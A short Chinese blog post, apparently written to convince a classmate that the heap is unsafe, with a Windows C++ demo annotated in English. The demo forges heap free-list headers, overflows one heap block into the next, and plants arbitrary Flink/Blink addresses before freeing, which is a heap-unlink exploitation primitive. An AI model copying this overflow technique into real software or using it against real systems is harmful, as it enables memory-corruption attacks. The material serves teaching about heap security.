前几日 研究堆本希望叫我同学明白 堆是不安全的 他不信我 讲又讲不明白他 于是狂骂之
今日无聊 写了个程序给他讲 白痴终于开窍了。。。
基本理论情况是蛮清楚的，一直没有写过这种东西
本不想搞这些东西 最终也抵制不了自己的好奇 人啊
真是个贱东西 me too
———————————————————————————
#include "stdafx.h"
#include <windows.h>
// Size of each HeapAlloc in _tmain; also the distance used to step past the end of buf1.
#define OFFSET 1024
// Two arbitrary addresses that get written into the forged entry's FreeList links
// (Flink/Blink). Nothing at these addresses is set up by this program.
#define Anyaddr 0x410020
#define Anydate 0x410000
// HEAP_ENTRY.Flags bit values as used by ntdll's heap manager. Only BUSY and
// SETTABLE_FLAG2 (and, via the literal 0x44, FILL_PATTERN) are used below.
#define HEAP_ENTRY_BUSY 0x01
#define HEAP_ENTRY_EXTRA_PRESENT 0x02
#define HEAP_ENTRY_FILL_PATTERN 0x04
#define HEAP_ENTRY_VIRTUAL_ALLOC 0x08
#define HEAP_ENTRY_LAST_ENTRY 0x10
#define HEAP_ENTRY_SETTABLE_FLAG1 0x20
#define HEAP_ENTRY_SETTABLE_FLAG2 0x40
#define HEAP_ENTRY_SETTABLE_FLAG3 0x80
#define HEAP_ENTRY_SETTABLE_FLAGS 0xE0
// Local mirror of the NT heap's free-entry layout (32-bit): an 8-byte chunk
// header followed by the free-list node that the heap keeps inside the freed
// block itself. With 4-byte pointers the struct is 16 bytes; with 8-byte
// pointers LIST_ENTRY alone is 16 bytes and the struct grows to 24.
// NOTE(review): this is the old, unprotected header layout (no header encoding,
// no link validation); later Windows heaps do not use it unchanged -- confirm
// against the target OS before reading anything into the offsets below.
typedef struct _HEAP_FREE_ENTRY {
USHORT Size;          // presumably the block size in heap granularity units, not bytes
USHORT PreviousSize;  // presumably the size of the preceding block (used when coalescing)
UCHAR SegmentIndex;
UCHAR Flags;          // HEAP_ENTRY_* bits defined above
UCHAR Index;
UCHAR Mask;
LIST_ENTRY FreeList;  // doubly linked free-list node: Flink / Blink
} HEAP_FREE_ENTRY, *PHEAP_FREE_ENTRY;
// Demonstration from the post: a stack buffer is reinterpreted as a heap
// free-entry header, forged headers are copied into and *past* two heap blocks,
// and both blocks are then freed so the heap manager walks the corrupted
// bookkeeping. The point being made is that heap metadata lives next to user
// data and is writable by an overflow; nothing here is a pattern to reuse.
// Builds as a C++ (MSVC _tmain/stdafx.h) project: sizeof(_HEAP_FREE_ENTRY)
// without the `struct` keyword is not valid C.
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE hHeap;
// 20-byte scratch area the forged entry is built in. This only fits on a 32-bit
// build (struct is 16 bytes there); on a 64-bit build the struct is 24 bytes and
// the field writes through pfheap_entry would overrun buff.
char buff[20];
char *buf1,*buf2,*buf3;   // buf3 is declared but never used
PHEAP_FREE_ENTRY pfheap_entry;
// Private heap: initial commit 0x10000, maximum 0xfffff (a non-zero maximum makes
// it non-growable). HEAP_GENERATE_EXCEPTIONS makes a failed allocation raise an
// exception instead of returning NULL, which is why the HeapAlloc results below
// are not checked.
hHeap = HeapCreate(HEAP_GENERATE_EXCEPTIONS, 0x10000, 0xfffff);
// Two OFFSET-byte (1024) blocks, both zeroed. The offsets used below assume the
// heap placed buf2's block directly after buf1's -- an inference, not something
// the API guarantees.
buf1 = (char*)HeapAlloc(hHeap,0,OFFSET);
memset(buff,0,20);
memset(buf1,0,OFFSET);
buf2 = (char*)HeapAlloc(hHeap,0,OFFSET);
memset(buf2,0,OFFSET);
// First forged entry, built in buff: marked BUSY | SETTABLE_FLAG2, Size 0x5,
// PreviousSize 0x83. The FreeList links are left as the zeros from memset.
pfheap_entry = (PHEAP_FREE_ENTRY)&buff;
pfheap_entry->PreviousSize = 0x83;
pfheap_entry->Size = 0x5;
pfheap_entry->SegmentIndex = 0x0;
pfheap_entry->Flags = HEAP_ENTRY_SETTABLE_FLAG2 | HEAP_ENTRY_BUSY;
pfheap_entry->Index = 0x18;
pfheap_entry->Mask = 0x0;
// OUT-OF-BOUNDS WRITE: buf1 is OFFSET (1024) bytes long, so buf1+1024+16 starts
// 16 bytes past its end; the 16-byte forged header lands in whatever the heap
// placed after buf1's block. This is the corruption the post is about.
memcpy(buf1+1024+16,pfheap_entry,sizeof(_HEAP_FREE_ENTRY ));
// Also reads past buf1's end: copies the 8 bytes at buf1+1024 (the real header
// of the following block, if the blocks are adjacent) into buf2 at offset 16.
memcpy(buf2+16,buf1+1024,8);
// Second forged entry: Flags 0x44 = SETTABLE_FLAG2 | FILL_PATTERN with the BUSY
// bit clear, i.e. it looks like a free block, and its FreeList links point at
// the two arbitrary #define addresses. It is stored inside buf2 at offset 32.
pfheap_entry = (PHEAP_FREE_ENTRY)&buff;
pfheap_entry->PreviousSize = 0x2;
pfheap_entry->Size = 0x83-0x5;
pfheap_entry->SegmentIndex = 0x0;
pfheap_entry->Flags = 0x44;
pfheap_entry->Index = 0x18;
pfheap_entry->Mask = 0x0;
pfheap_entry->FreeList.Flink = (LIST_ENTRY*)Anyaddr;
pfheap_entry->FreeList.Blink = (LIST_ENTRY*)Anydate;
memcpy(buf2+32,pfheap_entry,sizeof(_HEAP_FREE_ENTRY ));
// Freeing makes the heap manager process the now-inconsistent headers. The
// post's closing note says that once bookkeeping addresses have been changed
// they must be restored before returning, or the program cannot return cleanly.
// NOTE(review): on heaps that encode headers and validate free-list links this
// is expected to be caught as heap corruption rather than proceed -- confirm on
// the intended OS.
HeapFree(hHeap, 0, buf1);
HeapFree(hHeap, 0, buf2);
return 0;
}
————————————————————————-——————————
如果修改了管理地址，需要在 return 前修复此地址，
否则不能返回，或出现不可预料的错误